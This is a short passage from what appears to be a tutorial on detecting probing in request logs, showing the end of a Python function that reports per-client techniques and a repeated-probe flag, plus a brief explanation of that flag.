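            "techniques": sorted(found),
            "repeated_probe": max(shapes[client].values()) >= repeat_threshold,
        }
        for client, found in techniques.items()
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Clients that only request plain numeric ids do not appear in the report; the repeated-shape flag is what separates a burst of blind probes from a single stray match.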

Time: 2024-08-03 09:43:52
